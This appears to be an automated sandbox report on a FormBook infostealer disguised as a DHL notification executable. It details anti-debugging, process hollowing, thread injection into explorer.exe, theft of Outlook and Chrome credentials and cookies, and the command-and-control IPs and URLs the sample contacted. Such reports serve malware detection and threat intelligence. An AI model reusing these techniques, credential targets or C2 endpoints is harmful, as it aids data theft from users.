Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADAE44 mov eax, dword ptr fs:[00000030h] 3_2_00ADAE44
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADAE44 mov eax, dword ptr fs:[00000030h] 3_2_00ADAE44
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A28794 mov eax, dword ptr fs:[00000030h] 3_2_00A28794
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A97794 mov eax, dword ptr fs:[00000030h] 3_2_00A97794
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A97794 mov eax, dword ptr fs:[00000030h] 3_2_00A97794
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A97794 mov eax, dword ptr fs:[00000030h] 3_2_00A97794
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A537F5 mov eax, dword ptr fs:[00000030h] 3_2_00A537F5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A14F2E mov eax, dword ptr fs:[00000030h] 3_2_00A14F2E
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A14F2E mov eax, dword ptr fs:[00000030h] 3_2_00A14F2E
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4E730 mov eax, dword ptr fs:[00000030h] 3_2_00A4E730
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE070D mov eax, dword ptr fs:[00000030h] 3_2_00AE070D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE070D mov eax, dword ptr fs:[00000030h] 3_2_00AE070D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4A70E mov eax, dword ptr fs:[00000030h] 3_2_00A4A70E
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4A70E mov eax, dword ptr fs:[00000030h] 3_2_00A4A70E
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3F716 mov eax, dword ptr fs:[00000030h] 3_2_00A3F716
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAFF10 mov eax, dword ptr fs:[00000030h] 3_2_00AAFF10
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAFF10 mov eax, dword ptr fs:[00000030h] 3_2_00AAFF10
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2FF60 mov eax, dword ptr fs:[00000030h] 3_2_00A2FF60
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE8F6A mov eax, dword ptr fs:[00000030h] 3_2_00AE8F6A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2EF40 mov eax, dword ptr fs:[00000030h] 3_2_00A2EF40
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0040CF43 LdrLoadDll, 3_2_0040CF43
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_004018F8 SetUnhandledExceptionFilter, 1_2_004018F8
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040636B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_00401BF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00401BF3
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_00401796 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00401796

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.46.160.97 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.denko-kosan.com
Source: C:\Windows\explorer.exe Domain query: www.traindic.top
Source: C:\Windows\explorer.exe Network Connect: 1.13.186.125 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 219.94.129.181 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.0.231.77 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 67.222.24.48 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 49.212.180.95 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.bohndigitaltech.com
Source: C:\Windows\explorer.exe Domain query: www.0dhy.xyz
Source: C:\Windows\explorer.exe Domain query: www.yongleproducts.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.24.110 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.rifleroofers.com
Source: C:\Windows\explorer.exe Domain query: www.kunimi.org
Source: C:\Windows\explorer.exe Domain query: www.amirah.cfd
Source: C:\Windows\explorer.exe Domain query: www.bisarropainting.com
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1200000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\ldndbi.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Thread register set: target process: 3320 Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3320 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process created: C:\Users\user\AppData\Local\Temp\ldndbi.exe C:\Users\user~1\AppData\Local\Temp\ldndbi.exe Jump to behavior
Source: explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.509821634.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000002.514810946.00000000056F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.263500910.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.256320918.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.509821634.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.509821634.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_00401A05 cpuid 1_2_00401A05
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_0040167D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_0040167D
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 830435 Sample: DHL_Notification_pdf.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic 2->38 40 Multi AV Scanner detection for domain / URL 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 5 other signatures 2->44 9 DHL_Notification_pdf.exe 19 2->9         started        process3 file4 28 C:\Users\user\AppData\Local\Temp\ldndbi.exe, PE32 9->28 dropped 12 ldndbi.exe 1 9->12         started        process5 signatures6 58 Multi AV Scanner detection for dropped file 12->58 60 Detected unpacking (changes PE section rights) 12->60 62 Maps a DLL or memory area into another process 12->62 15 ldndbi.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 64 Modifies the context of a thread in another process (thread injection) 15->64 66 Maps a DLL or memory area into another process 15->66 68 Sample uses process hollowing technique 15->68 70 Queues an APC in another process (thread injection) 15->70 20 explorer.exe 2 6 15->20 injected process9 dnsIp10 30 bohndigitaltech.com 162.241.24.110, 49709, 49710, 80 UNIFIEDLAYER-AS-1US United States 20->30 32 kunimi.org 219.94.129.181, 49705, 49706, 80 SAKURA-CSAKURAInternetIncJP Japan 20->32 34 11 other IPs or domains 20->34 46 System process connects to network (likely due to code injection or exploit) 20->46 48 Performs DNS queries to domains with low reputation 20->48 24 cmmon32.exe 13 20->24         started        signatures11 process12 dnsIp13 36 www.yongleproducts.com 24->36 50 Tries to steal Mail credentials (via file / registry access) 24->50 52 Tries to harvest and steal browser information (history, passwords, etc) 24->52 54 Modifies the context of a thread in another process (thread injection) 24->54 56 Maps a DLL or memory area into another process 24->56 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.46.160.97
 www.0dhy.xyz United States
36352 AS-COLOCROSSINGUS true
67.222.24.48
 rifleroofers.com United States
63410 PRIVATESYSTEMSUS true
49.212.180.95
 denko-kosan.com Japan 9371 SAKURA-CSAKURAInternetIncJP true
1.13.186.125
 www.yongleproducts.com China
13335 CLOUDFLARENETUS true
162.241.24.110
 bohndigitaltech.com United States
46606 UNIFIEDLAYER-AS-1US true
219.94.129.181
 kunimi.org Japan 9371 SAKURA-CSAKURAInternetIncJP true
162.0.231.77
 www.traindic.top Canada
22612 NAMECHEAP-NETUS true

Contacted Domains

Name IP Active
kunimi.org 219.94.129.181 true
bohndigitaltech.com 162.241.24.110 true
www.0dhy.xyz 198.46.160.97 true
rifleroofers.com 67.222.24.48 true
www.yongleproducts.com 1.13.186.125 true
www.traindic.top 162.0.231.77 true
denko-kosan.com 49.212.180.95 true
www.bohndigitaltech.com unknown unknown
www.denko-kosan.com unknown unknown
www.rifleroofers.com unknown unknown
www.kunimi.org unknown unknown
www.amirah.cfd unknown unknown
www.bisarropainting.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.rifleroofers.com/hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCikRZslZ7vUOEqSXS/sLR9FgE&MWgiD_=Gt_IudmBZP true
  • Avira URL Cloud: safe
 unknown
http://www.kunimi.org/hpb7/ true
  • Avira URL Cloud: safe
 unknown
http://www.traindic.top/hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZP true
  • Avira URL Cloud: malware
 unknown
http://www.traindic.top/hpb7/ true
  • Avira URL Cloud: malware
 unknown
http://www.bohndigitaltech.com/hpb7/ true
  • Avira URL Cloud: safe
 unknown
http://www.denko-kosan.com/hpb7/ true
  • Avira URL Cloud: safe
 unknown
http://www.0dhy.xyz/hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZP true
  • Avira URL Cloud: malware
 unknown
http://www.denko-kosan.com/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/MT4aa5FcMBKGUU6DgJQXharGK true
  • Avira URL Cloud: safe
 unknown
http://www.rifleroofers.com/hpb7/ true
  • Avira URL Cloud: safe
 unknown